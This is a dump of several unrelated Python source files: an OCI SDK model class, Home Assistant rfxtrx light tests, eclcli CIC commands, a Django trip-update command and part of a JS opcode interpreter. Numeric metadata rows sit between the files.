:return: The time_assignment_to of this OperatorControlAssignmentSummary.
:rtype: datetime
"""
return self._time_assignment_to
@time_assignment_to.setter
def time_assignment_to(self, time_assignment_to):
"""
Sets the time_assignment_to of this OperatorControlAssignmentSummary.
The time at which the target resource will leave the governance of the operator control in `RFC 3339`__timestamp format.Example: '2020-05-22T21:10:29.600Z'
__ https://tools.ietf.org/html/rfc3339
:param time_assignment_to: The time_assignment_to of this OperatorControlAssignmentSummary.
:type: datetime
"""
self._time_assignment_to = time_assignment_to
@property
def is_enforced_always(self):
"""
Gets the is_enforced_always of this OperatorControlAssignmentSummary.
If true, then the target resource is always governed by the operator control. Otherwise governance is time-based as specified by timeAssignmentTo and timeAssignmentFrom.
:return: The is_enforced_always of this OperatorControlAssignmentSummary.
:rtype: bool
"""
return self._is_enforced_always
@is_enforced_always.setter
def is_enforced_always(self, is_enforced_always):
"""
Sets the is_enforced_always of this OperatorControlAssignmentSummary.
If true, then the target resource is always governed by the operator control. Otherwise governance is time-based as specified by timeAssignmentTo and timeAssignmentFrom.
:param is_enforced_always: The is_enforced_always of this OperatorControlAssignmentSummary.
:type: bool
"""
self._is_enforced_always = is_enforced_always
@property
def time_of_assignment(self):
"""
Gets the time_of_assignment of this OperatorControlAssignmentSummary.
Time when the operator control assignment is created in `RFC 3339`__ timestamp format. Example: '2020-05-22T21:10:29.600Z'
__ https://tools.ietf.org/html/rfc3339
:return: The time_of_assignment of this OperatorControlAssignmentSummary.
:rtype: datetime
"""
return self._time_of_assignment
@time_of_assignment.setter
def time_of_assignment(self, time_of_assignment):
"""
Sets the time_of_assignment of this OperatorControlAssignmentSummary.
Time when the operator control assignment is created in `RFC 3339`__ timestamp format. Example: '2020-05-22T21:10:29.600Z'
__ https://tools.ietf.org/html/rfc3339
:param time_of_assignment: The time_of_assignment of this OperatorControlAssignmentSummary.
:type: datetime
"""
self._time_of_assignment = time_of_assignment
@property
def lifecycle_state(self):
"""
Gets the lifecycle_state of this OperatorControlAssignmentSummary.
The current lifcycle state of the OperatorControl.
Allowed values for this property are: "CREATED", "APPLIED", "APPLYFAILED", "DELETED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The lifecycle_state of this OperatorControlAssignmentSummary.
:rtype: str
"""
return self._lifecycle_state
@lifecycle_state.setter
def lifecycle_state(self, lifecycle_state):
"""
Sets the lifecycle_state of this OperatorControlAssignmentSummary.
The current lifcycle state of the OperatorControl.
:param lifecycle_state: The lifecycle_state of this OperatorControlAssignmentSummary.
:type: str
"""
allowed_values = ["CREATED", "APPLIED", "APPLYFAILED", "DELETED"]
if not value_allowed_none_or_none_sentinel(lifecycle_state, allowed_values):
lifecycle_state = 'UNKNOWN_ENUM_VALUE'
self._lifecycle_state = lifecycle_state
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this OperatorControlAssignmentSummary.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
:return: The freeform_tags of this OperatorControlAssignmentSummary.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this OperatorControlAssignmentSummary.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
:param freeform_tags: The freeform_tags of this OperatorControlAssignmentSummary.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def defined_tags(self):
"""
Gets the defined_tags of this OperatorControlAssignmentSummary.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
:return: The defined_tags of this OperatorControlAssignmentSummary.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this OperatorControlAssignmentSummary.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
:param defined_tags: The defined_tags of this OperatorControlAssignmentSummary.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 37.220982 | 245 | 0.688096 | 1,884 | 16,675 | 5.865711 | 0.105626 | 0.033119 | 0.206316 | 0.095014 | 0.742467 | 0.653244 | 0.587458 | 0.45652 | 0.398154 | 0.384581 | 0 | 0.013395 | 0.247856 | 16,675 | 447 | 246 | 37.304251 | 0.867724 | 0.593823 | 0 | 0.090909 | 0 | 0 | 0.128977 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.212121 | false | 0 | 0.015152 | 0.015152 | 0.386364 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b965c7d52ff43c31b25341fac7a3a921be2cf8b7 | 230 | py | Python | oop/is_mutable.py | NathanKr/python-playground | 03ea7f6489ab4db84c8180332a2ebf07caa9136e | [
"MIT"
] | null | null | null | oop/is_mutable.py | NathanKr/python-playground | 03ea7f6489ab4db84c8180332a2ebf07caa9136e | [
"MIT"
] | null | null | null | oop/is_mutable.py | NathanKr/python-playground | 03ea7f6489ab4db84c8180332a2ebf07caa9136e | [
"MIT"
] | null | null | null | class Foo:
num1 : int
num2 : int
foo1 = Foo()
id_foo1_before = id(foo1)
foo1.num1 = 1
id_foo1_after = id(foo1)
if id_foo1_before == id_foo1_after:
print('Foo is immutable')
else:
print('Foo is mutable')
| 15.333333 | 35 | 0.634783 | 37 | 230 | 3.72973 | 0.432432 | 0.26087 | 0.173913 | 0.202899 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 0.252174 | 230 | 14 | 36 | 16.428571 | 0.732558 | 0 | 0 | 0 | 0 | 0 | 0.131004 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.272727 | 0.181818 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b96dec95e6e6bb7a13ec07cf4301f991e5cb3254 | 6,071 | py | Python | tests/components/rfxtrx/test_light.py | tinker1992/home-assistant | 79b1c3f57396ec6ea34525c7a3b12012e3a370a5 | [
"Apache-2.0"
] | null | null | null | tests/components/rfxtrx/test_light.py | tinker1992/home-assistant | 79b1c3f57396ec6ea34525c7a3b12012e3a370a5 | [
"Apache-2.0"
] | 36 | 2020-08-03T07:31:17.000Z | 2022-03-31T06:02:05.000Z | tests/components/rfxtrx/test_light.py | tinker1992/home-assistant | 79b1c3f57396ec6ea34525c7a3b12012e3a370a5 | [
"Apache-2.0"
] | null | null | null | """The tests for the Rfxtrx light platform."""
from unittest.mock import call
import pytest
from homeassistant.components.light import ATTR_BRIGHTNESS
from homeassistant.core import State
from homeassistant.setup import async_setup_component
from . import _signal_event
from tests.common import mock_restore_cache
async def test_one_light(hass, rfxtrx):
"""Test with 1 light."""
assert await async_setup_component(
hass,
"rfxtrx",
{"rfxtrx": {"device": "abcd", "devices": {"0b1100cd0213c7f210020f51": {}}}},
)
await hass.async_block_till_done()
state = hass.states.get("light.ac_213c7f2_16")
assert state
assert state.state == "off"
assert state.attributes.get("friendly_name") == "AC 213c7f2:16"
await hass.services.async_call(
"light", "turn_on", {"entity_id": "light.ac_213c7f2_16"}, blocking=True
)
state = hass.states.get("light.ac_213c7f2_16")
assert state.state == "on"
assert state.attributes.get("brightness") == 255
await hass.services.async_call(
"light", "turn_off", {"entity_id": "light.ac_213c7f2_16"}, blocking=True
)
state = hass.states.get("light.ac_213c7f2_16")
assert state.state == "off"
assert state.attributes.get("brightness") is None
await hass.services.async_call(
"light",
"turn_on",
{"entity_id": "light.ac_213c7f2_16", "brightness": 100},
blocking=True,
)
state = hass.states.get("light.ac_213c7f2_16")
assert state.state == "on"
assert state.attributes.get("brightness") == 100
await hass.services.async_call(
"light",
"turn_on",
{"entity_id": "light.ac_213c7f2_16", "brightness": 10},
blocking=True,
)
state = hass.states.get("light.ac_213c7f2_16")
assert state.state == "on"
assert state.attributes.get("brightness") == 10
await hass.services.async_call(
"light",
"turn_on",
{"entity_id": "light.ac_213c7f2_16", "brightness": 255},
blocking=True,
)
state = hass.states.get("light.ac_213c7f2_16")
assert state.state == "on"
assert state.attributes.get("brightness") == 255
await hass.services.async_call(
"light", "turn_off", {"entity_id": "light.ac_213c7f2_16"}, blocking=True
)
state = hass.states.get("light.ac_213c7f2_16")
assert state.state == "off"
assert state.attributes.get("brightness") is None
assert rfxtrx.transport.send.mock_calls == [
call(bytearray(b"\x0b\x11\x00\x00\x02\x13\xc7\xf2\x10\x01\x00\x00")),
call(bytearray(b"\x0b\x11\x00\x00\x02\x13\xc7\xf2\x10\x00\x00\x00")),
call(bytearray(b"\x0b\x11\x00\x00\x02\x13\xc7\xf2\x10\x02\x06\x00")),
call(bytearray(b"\x0b\x11\x00\x00\x02\x13\xc7\xf2\x10\x02\x00\x00")),
call(bytearray(b"\x0b\x11\x00\x00\x02\x13\xc7\xf2\x10\x02\x0f\x00")),
call(bytearray(b"\x0b\x11\x00\x00\x02\x13\xc7\xf2\x10\x00\x00\x00")),
]
@pytest.mark.parametrize("state,brightness", [["on", 100], ["on", 50], ["off", None]])
async def test_state_restore(hass, rfxtrx, state, brightness):
"""State restoration."""
entity_id = "light.ac_213c7f2_16"
mock_restore_cache(
hass, [State(entity_id, state, attributes={ATTR_BRIGHTNESS: brightness})]
)
assert await async_setup_component(
hass,
"rfxtrx",
{"rfxtrx": {"device": "abcd", "devices": {"0b1100cd0213c7f210020f51": {}}}},
)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == state
assert hass.states.get(entity_id).attributes.get(ATTR_BRIGHTNESS) == brightness
async def test_several_lights(hass, rfxtrx):
"""Test with 3 lights."""
assert await async_setup_component(
hass,
"rfxtrx",
{
"rfxtrx": {
"device": "abcd",
"devices": {
"0b1100cd0213c7f230020f71": {},
"0b1100100118cdea02020f70": {},
"0b1100101118cdea02050f70": {},
},
}
},
)
await hass.async_block_till_done()
state = hass.states.get("light.ac_213c7f2_48")
assert state
assert state.state == "off"
assert state.attributes.get("friendly_name") == "AC 213c7f2:48"
state = hass.states.get("light.ac_118cdea_2")
assert state
assert state.state == "off"
assert state.attributes.get("friendly_name") == "AC 118cdea:2"
state = hass.states.get("light.ac_1118cdea_2")
assert state
assert state.state == "off"
assert state.attributes.get("friendly_name") == "AC 1118cdea:2"
@pytest.mark.parametrize("repetitions", [1, 3])
async def test_repetitions(hass, rfxtrx, repetitions):
"""Test signal repetitions."""
assert await async_setup_component(
hass,
"rfxtrx",
{
"rfxtrx": {
"device": "abcd",
"devices": {
"0b1100cd0213c7f230020f71": {"signal_repetitions": repetitions}
},
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
"light", "turn_on", {"entity_id": "light.ac_213c7f2_48"}, blocking=True
)
await hass.async_block_till_done()
assert rfxtrx.transport.send.call_count == repetitions
async def test_discover_light(hass, rfxtrx):
"""Test with discovery of lights."""
assert await async_setup_component(
hass, "rfxtrx", {"rfxtrx": {"device": "abcd", "automatic_add": True}},
)
await hass.async_block_till_done()
await hass.async_start()
await _signal_event(hass, "0b11009e00e6116202020070")
state = hass.states.get("light.ac_0e61162_2")
assert state
assert state.state == "on"
assert state.attributes.get("friendly_name") == "AC 0e61162:2"
await _signal_event(hass, "0b1100120118cdea02020070")
state = hass.states.get("light.ac_118cdea_2")
assert state
assert state.state == "on"
assert state.attributes.get("friendly_name") == "AC 118cdea:2"
| 32.121693 | 86 | 0.633998 | 738 | 6,071 | 5.042005 | 0.139566 | 0.088686 | 0.060199 | 0.060199 | 0.72588 | 0.713518 | 0.680731 | 0.6681 | 0.651169 | 0.646869 | 0 | 0.098669 | 0.220392 | 6,071 | 188 | 87 | 32.292553 | 0.687513 | 0.006589 | 0 | 0.536913 | 0 | 0.040268 | 0.251784 | 0.081549 | 0 | 0 | 0 | 0 | 0.261745 | 1 | 0 | false | 0 | 0.04698 | 0 | 0.04698 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9ac8d933a862f6486659d3e03d472b18cbd344c | 5,850 | py | Python | eclcli/interconnectivity/v1/cic.py | hanasuke/eclcli | a72191799986a02596d0d467253fd9f5ee03c5c8 | [
"Apache-2.0"
] | 32 | 2016-08-31T04:12:40.000Z | 2020-12-11T04:49:57.000Z | eclcli/interconnectivity/v1/cic.py | hanasuke/eclcli | a72191799986a02596d0d467253fd9f5ee03c5c8 | [
"Apache-2.0"
] | 27 | 2016-09-06T07:50:36.000Z | 2021-09-14T09:46:03.000Z | eclcli/interconnectivity/v1/cic.py | hanasuke/eclcli | a72191799986a02596d0d467253fd9f5ee03c5c8 | [
"Apache-2.0"
] | 24 | 2016-09-02T01:09:09.000Z | 2021-01-19T09:14:16.000Z |
import six
from eclcli.common import command
from eclcli.common import exceptions
from eclcli.common import utils
from ..interconnectivityclient.common.utils import objectify, get_request_body
class ListCIC(command.Lister):
def get_parser(self, prog_name):
parser = super(ListCIC, self).get_parser(prog_name)
parser.add_argument(
"--mcic_id",
metavar="<mcic_id>",
required=True,
help="id of mcic to list CIC (ID)")
return parser
def take_action(self, parsed_args):
connectivity_client = self.app.client_manager.interconnectivity
columns = (
'cic_id',
'cic_name',
'cic_status',
)
column_headers = (
'ID',
'Name',
'Status',
)
data = [objectify(cic)
for cic in connectivity_client.list_cics(parsed_args.mcic_id)]
return (column_headers,
(utils.get_item_properties(
s, columns,
) for s in data))
class ShowCIC(command.ShowOne):
def get_parser(self, prog_name):
parser = super(ShowCIC, self).get_parser(prog_name)
parser.add_argument(
"--mcic_id",
metavar="<mcic_id>",
required=True,
help="mcic to display (ID)")
parser.add_argument(
"--cic_id",
metavar="<cic_id>",
required=True,
help="cic to display (ID)")
return parser
def take_action(self, parsed_args):
ecc_client = self.app.client_manager.interconnectivity
try:
cic = ecc_client.show_cic(parsed_args.mcic_id, parsed_args.cic_id)
printout = cic
except exceptions.ClientException as clientexp:
printout = {"message": clientexp.message,
"details": clientexp.details,
"code": clientexp.code}
return zip(*sorted(six.iteritems(printout)))
class CreateCIC(command.ShowOne):
def get_parser(self, prog_name):
parser = super(CreateCIC, self).get_parser(prog_name)
parser.add_argument(
'--mcic_id',
metavar='<mcic_id>',
required=True,
help='mCIC ID [Type: String]')
parser.add_argument(
'--cic_name',
metavar='<cic_name>',
required=True,
help='CIC friendly name [Type: String]')
parser.add_argument(
'--logical_nw_id',
metavar='<logical_nw_id>',
required=True,
help='NGC logical NW ID [Type: String]')
parser.add_argument(
'--colo_vlan_id',
metavar='<colo_vlan_id>',
help='Co-location VLAN ID [Type: Int]')
parser.add_argument(
'--server_segment_nbr',
metavar='<server_segment_nbr>',
help='Server Segment Number [Type: Int]')
return parser
def take_action(self, parsed_args):
ecc_client = self.app.client_manager.interconnectivity
required = ('cic_name', 'logical_nw_id')
optional = ('colo_vlan_id', 'server_segment_nbr')
body = get_request_body(parsed_args, required, optional)
try:
cic = ecc_client.create_cic(body, parsed_args.mcic_id)
printout = cic
except exceptions.ClientException as clientexp:
printout = {"message": clientexp.message,
"details": clientexp.details,
"code": clientexp.code}
return zip(*sorted(six.iteritems(printout)))
class UpdateCIC(command.ShowOne):
def get_parser(self, prog_name):
parser = super(UpdateCIC, self).get_parser(prog_name)
parser.add_argument(
'--mcic_id',
metavar='<mcic_id>',
required=True,
help='mCIC ID [Type: String]')
parser.add_argument(
'--cic_id',
metavar='<cic_id>',
required=True,
help='CIC ID [Type: String]')
parser.add_argument(
'--cic_name',
metavar='<cic_name>',
help='CIC friendly name [Type: String]')
return parser
def take_action(self, parsed_args):
ecc_client = self.app.client_manager.interconnectivity
required = ()
optional = ('cic_name',)
body = get_request_body(parsed_args, required, optional)
try:
cic = ecc_client.update_cic(body=body, mcic_id=parsed_args.mcic_id, cic_id=parsed_args.cic_id, )
printout = cic
except exceptions.ClientException as clientexp:
printout = {"message": clientexp.message,
"details": clientexp.details,
"code": clientexp.code}
return zip(*sorted(six.iteritems(printout)))
class DeleteCIC(command.ShowOne):
def get_parser(self, prog_name):
parser = super(DeleteCIC, self).get_parser(prog_name)
parser.add_argument(
"--mcic_id",
metavar="<mcic_id>",
required=True,
help="mcic to display (ID)")
parser.add_argument(
"--cic_id",
metavar="<cic_id>",
required=True,
help="cic to display (ID)")
return parser
def take_action(self, parsed_args):
ecc_client = self.app.client_manager.interconnectivity
try:
cic = ecc_client.delete_cic(parsed_args.mcic_id, parsed_args.cic_id)
printout = cic
except exceptions.ClientException as clientexp:
printout = {"message": clientexp.message,
"details": clientexp.details,
"code": clientexp.code}
return zip(*sorted(six.iteritems(printout)))
| 33.815029 | 108 | 0.568205 | 619 | 5,850 | 5.150242 | 0.151858 | 0.033877 | 0.069322 | 0.050816 | 0.739335 | 0.734003 | 0.693225 | 0.693225 | 0.682246 | 0.669385 | 0 | 0 | 0.324957 | 5,850 | 172 | 109 | 34.011628 | 0.807293 | 0 | 0 | 0.649007 | 0 | 0 | 0.13233 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066225 | false | 0 | 0.033113 | 0 | 0.198676 | 0.07947 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9ad80640a01080d03ced28bf57510db3499b0e2 | 784 | py | Python | travels/management/commands/add_trips_fields.py | adrianboratyn/TripRecommendations | d3e5a10d80c405d5ac22f028be54c8198bc10410 | [
"MIT"
] | null | null | null | travels/management/commands/add_trips_fields.py | adrianboratyn/TripRecommendations | d3e5a10d80c405d5ac22f028be54c8198bc10410 | [
"MIT"
] | null | null | null | travels/management/commands/add_trips_fields.py | adrianboratyn/TripRecommendations | d3e5a10d80c405d5ac22f028be54c8198bc10410 | [
"MIT"
] | 2 | 2021-06-26T13:03:22.000Z | 2021-06-27T10:47:59.000Z | import pandas as pd
import os.path
from django.core.management.base import BaseCommand, CommandError
import logging
from travels.models import Trip, TripDates
import datetime
import random
class Command(BaseCommand):
"""
Klasa do tworzenia typów wycieczek
"""
help = "Creating fields in Trips"
trips = Trip.objects.all().filter(country="Wyspy Zielonego Przylądka")
def handle(self, *args, **options):
"""
Metoda do tworzenia typów wycieczek
Args:
*args ():
**options ():
"""
for trip in self.trips:
trip.countryEN = "United Arab Emirates"
trip.currency = "CVE"
trip.climate = "Morski"
trip.rating = random.uniform(1, 6)
trip.save()
| 25.290323 | 74 | 0.608418 | 86 | 784 | 5.546512 | 0.686047 | 0.046122 | 0.067086 | 0.104822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00361 | 0.293367 | 784 | 30 | 75 | 26.133333 | 0.857401 | 0.137755 | 0 | 0 | 0 | 0 | 0.127243 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.411765 | 0 | 0.647059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
b9b5e7332c9a273f6491cc9f8d7e111d28e387bb | 13,105 | py | Python | tools/extjs_cc/js_opcode_exec.py | joeedh/webblender | 552d8eaa762af447346343be244647c316ae32f1 | [
"Apache-2.0"
] | 1 | 2015-05-22T14:11:17.000Z | 2015-05-22T14:11:17.000Z | tools/extjs_cc/js_opcode_exec.py | joeedh/webblender | 552d8eaa762af447346343be244647c316ae32f1 | [
"Apache-2.0"
] | 2 | 2021-09-02T20:01:35.000Z | 2022-01-26T19:47:35.000Z | tools/extjs_cc/js_opcode_exec.py | joeedh/fairmotion | 5c322fc012cdd94ddc2f21d68264c845b3c2c770 | [
"MIT"
] | null | null | null | import traceback, sys
from js_opcode_emit import MAX_REGISTER
from js_global import glob
opcode_map = {}
code = 0
def _gen_code():
global code
code += 1
return code - 1
opcode_map["PUSH"] = _gen_code()
opcode_map["POP"] = _gen_code()
opcode_map["PUSH_UNDEFINED"] = _gen_code()
opcode_map["LOAD_FROM_REG"] = _gen_code()
opcode_map["LOAD_LOCAL_STACK"] = _gen_code()
opcode_map["WRITE_LOCAL_STACK"] = _gen_code()
opcode_map["LOAD_REG_REF"] = _gen_code()
opcode_map["LOAD_REG_INT"] = _gen_code()
opcode_map["LOAD_REG_PTR"] = _gen_code()
opcode_map["LOAD_REG_EXTERN_PTR"] = _gen_code()
opcode_map["LOAD_REG_UNDEFINED"] = _gen_code()
opcode_map["LOAD_REG_FLOAT"] = _gen_code()
opcode_map["LOAD_SYMBOL_PTR"] = _gen_code()
opcode_map["LOAD_SYMBOL_INT"] = _gen_code()
opcode_map["NATIVE_CALL"] = _gen_code()
opcode_map["LOAD_SYMBOL_FLOAT"] = _gen_code()
opcode_map["WRITE_SYMBOL_REF"] = _gen_code()
opcode_map["WRITE_SYMBOL_INT"] = _gen_code()
opcode_map["WRITE_SYMBOL_FLOAT"] = _gen_code()
opcode_map["LOAD_REG_SYMBOL_PTR"] = _gen_code()
opcode_map["LOAD_OPCODE_PTR"] = _gen_code()
opcode_map["WRITE_REG_INT"] = _gen_code()
opcode_map["WRITE_REG_FLOAT"] = _gen_code()
opcode_map["WRITE_REG_REF"] = _gen_code()
opcode_map["WRITE_REG_PTR"] = _gen_code()
opcode_map["LOAD_REF"] = _gen_code()
opcode_map["WRITE_REF"] = _gen_code()
opcode_map["LOAD_CONST_REF"] = _gen_code()
opcode_map["LOAD_CONST_INT"] = _gen_code()
opcode_map["LOAD_CONST_FLOAT"] = _gen_code()
opcode_map["INT_TO_FLOAT"] = _gen_code()
opcode_map["UNDEFINED_TO_ZERO_INT"] = _gen_code()
opcode_map["FLOAT_TO_INT"] = _gen_code()
opcode_map["LOAD_FLOAT"] = _gen_code()
opcode_map["WRITE_REF_LOCAL"] = _gen_code()
opcode_map["WRITE_INT_LOCAL"] = _gen_code()
opcode_map["WRITE_FLOAT_LOCAL"] = _gen_code()
opcode_map["LOAD_REF_LOCAL"] = _gen_code()
opcode_map["LOAD_INT_LOCAL"] = _gen_code()
opcode_map["LOAD_FLOAT_LOCAL"] = _gen_code()
opcode_map["PUSH_REF"] = _gen_code()
opcode_map["SHORTJMP"] = _gen_code()
opcode_map["SHORTJMPTRUE"] = _gen_code()
opcode_map["SHORTJMPTRUE_REG"] = _gen_code()
opcode_map["SHORTJMPFALSE"] = _gen_code()
opcode_map["SHORTJMPFALSE_REG"] = _gen_code()
opcode_map["LONGJMP"] = _gen_code()
opcode_map["PUSHTRY"] = _gen_code()
opcode_map["POPTRY"] = _gen_code()
opcode_map["THROW"] = _gen_code()
opcode_map["INT_TO_FLOAT"] = _gen_code()
opcode_map["FLOAT_TO_INT"] = _gen_code()
opcode_map["ARRAY_REF"] = _gen_code()
opcode_map["ARRAY_SET"] = _gen_code()
opcode_map["ADD_INT"] = _gen_code()
opcode_map["SUB_INT"] = _gen_code()
opcode_map["MUL_INT"] = _gen_code()
opcode_map["DIV_INT"] = _gen_code()
opcode_map["MOD_INT"] = _gen_code()
opcode_map["BITINV"] = _gen_code()
opcode_map["BITAND"] = _gen_code()
opcode_map["BITOR"] = _gen_code()
opcode_map["BITXOR"] = _gen_code()
opcode_map["LSHIFT"] = _gen_code()
opcode_map["RSHIFT"] = _gen_code()
opcode_map["NEGATE"] = _gen_code()
opcode_map["ADD_FLOAT"] = _gen_code()
opcode_map["SUB_FLOAT"] = _gen_code()
opcode_map["MUL_FLOAT"] = _gen_code()
opcode_map["DIV_FLOAT"] = _gen_code()
opcode_map["MOD_FLOAT"] = _gen_code()
opcode_map["LTHAN_INT"] = _gen_code()
opcode_map["GTHAN_INT"] = _gen_code()
opcode_map["LTHANEQ_INT"] = _gen_code()
opcode_map["GTHANEQ_INT"] = _gen_code()
opcode_map["EQ_INT"] = _gen_code()
opcode_map["NOTEQ_INT"] = _gen_code()
opcode_map["NOT_INT"] = _gen_code()
opcode_map["LTHAN_FLOAT"] = _gen_code()
opcode_map["GTHAN_FLOAT"] = _gen_code()
opcode_map["LTHANEQ_FLOAT"] = _gen_code()
opcode_map["GTHANEQ_FLOAT"] = _gen_code()
opcode_map["EQ_FLOAT"] = _gen_code()
opcode_map["NOTEQ_FLOAT"] = _gen_code()
opcode_map["AND"] = _gen_code()
opcode_map["OR"] = _gen_code()
opcode_map["ADD"] = _gen_code()
opcode_map["SUB"] = _gen_code()
opcode_map["MUL"] = _gen_code()
opcode_map["DIV"] = _gen_code()
opcode_map["IN"] = _gen_code()
opcode_map["LOAD_REG_PTR_CONST"] = _gen_code()
rev_opcode_map = {}
for k in opcode_map:
rev_opcode_map[opcode_map[k]] = k
class StackItem:
def __init__(self, value=None):
self.value = value
def __str__(self):
return str(self.value)
def __repr__(self):
return str(self)
class Object:
def __init__(self):
self.init = None
self.type_name = ""
self.methods = {}
self.properties = {}
self.child_classes = []
self.class_parent = None
def __str__(self):
return "(obj)"
def __repr__(self):
return str(self)
class UndefinedType(Object):
def __str__(self):
return "None"
Undefined = UndefinedType()
def do_print(machine, string):
print("print:", str(string))
def do_fstr(machine, f):
return str(f)
do_print.totarg = 1
do_fstr.totarg = 1
class Interpretor:
def __init__(self):
self.functions = {"print" : do_print, "fstr" : do_fstr} #native functions
self.globals = {}
self.stack = [StackItem()]
self.code = []
self.cur = 0
self.registers = [Undefined for x in range(MAX_REGISTER)]
self.error = 0
self.trystack = []
self.opfuncs = [0 for x in range(len(opcode_map)+2)]
for k in opcode_map:
if hasattr(self, k):
self.opfuncs[opcode_map[k]] = getattr(self, k)
def reset(self):
self.cur = 0
self.registers = [Undefined for x in range(MAX_REGISTER)]
self.stack = [StackItem()]
def run_function(self, code, funcnode, args):
self.reset()
self.code = code
self.stack.append(StackItem(-1))
for a in args:
self.stack.append(StackItem(a))
self.run(code, funcnode.opcode_addr, do_reset=False)
def run(self, code, entry, do_reset=True):
limit = 500
if do_reset:
self.reset()
self.code = code;
self.cur = entry;
print("\n")
print("starting stack:")
st = self.stack[:]
st.reverse()
for s in st:
print(" " + str(s.value))
print("\n")
def rev(lst):
l = lst[:]
l.reverse()
return str(l)
i = 0
code = self.code
while i < limit:
c = code[self.cur]
self.cur += 1
try:
self.opfuncs[c.type](c.arg)
except:
if glob.g_debug_opcode:
print("%03d %d %s %s | %s %s"%(c.i, c.code, str(c.arg), rev(self.stack[-4:len(self.stack)]), str(self.registers)))
traceback.print_stack()
traceback.print_exc()
sys.exit(-1)
if glob.g_debug_opcode:
print("%03d %s %s | %s %s"%(c.i, c.code, str(c.arg), rev(self.stack[-4:len(self.stack)]), str(self.registers)))
if self.cur < 0: break
i += 1
print("\n")
print("finished", i)
def PUSH(self, args=None):
self.stack.append(StackItem())
def POP(self, args=None):
return self.stack.pop(-1)
def PUSH_UNDEFINED(self, args):
self.stack.push(StackItem(Undefined))
def LOAD_FROM_REG(self, args):
self.stack[-1].value = self.registers[args]
def LOAD_LOCAL_STACK(self, args):
#print(self.stack)
self.stack[-1].value = self.stack[args].value
def WRITE_LOCAL_STACK(self, args):
self.stack[args].value = self.stack[-1].value
def LOAD_REG_PTR_CONST(self, args):
self.registers[args[0]] = args[1]
def LOAD_REG_REF(self, args):
self.registers[args] = self.stack[-1].value
def LOAD_REG_INT(self, args):
self.registers[args] = self.stack[-1].value
def LOAD_REG_PTR(self, args):
self.registers[args] = self.stack[-1].value
def LOAD_REG_EXTERN_PTR(self, args):
raise RuntimeError("Opcode not fully processed")
def LOAD_REG_UNDEFINED(self, args):
self.registers[args] = Undefined
def LOAD_REG_FLOAT(self, args):
self.registers[args] = self.stack[-1].value
def LOAD_SYMBOL_PTR(self, args):
raise RuntimeError("Opcode not fully processed")
def LOAD_SYMBOL_INT(self, args):
raise RuntimeError("Opcode not fully processed")
def NATIVE_CALL(self, fname):
args = []
totarg = self.functions[fname].totarg
for i in range(self.functions[fname].totarg):
args.append(self.POP(None).value)
ret = self.functions[fname](self, *args)
#return to calling code, with value ret
self.LOAD_REG_PTR(0) #save return value
self.stack[-1].value = ret
self.LONGJMP(0)
def LOAD_SYMBOL_FLOAT(self, args):
raise RuntimeError("Incomplete opcode")
def WRITE_SYMBOL_REF(self, args):
raise RuntimeError("Incomplete opcode")
def WRITE_SYMBOL_INT(self, args):
raise RuntimeError("Incomplete opcode")
def WRITE_SYMBOL_FLOAT(self, args):
raise RuntimeError("Incomplete opcode")
def LOAD_REG_SYMBOL_PTR(self, args):
self.registers[args] = self.stack
def LOAD_OPCODE_PTR(self, args):
self.stack[-1].value = args
def LOAD_REF(self, args):
self.stack[-1].value = args
def LOAD_CONST_REF(self, args):
self.stack[-1].value = args
def LOAD_CONST_INT(self, args):
self.stack[-1].value = args
def LOAD_CONST_FLOAT(self, args):
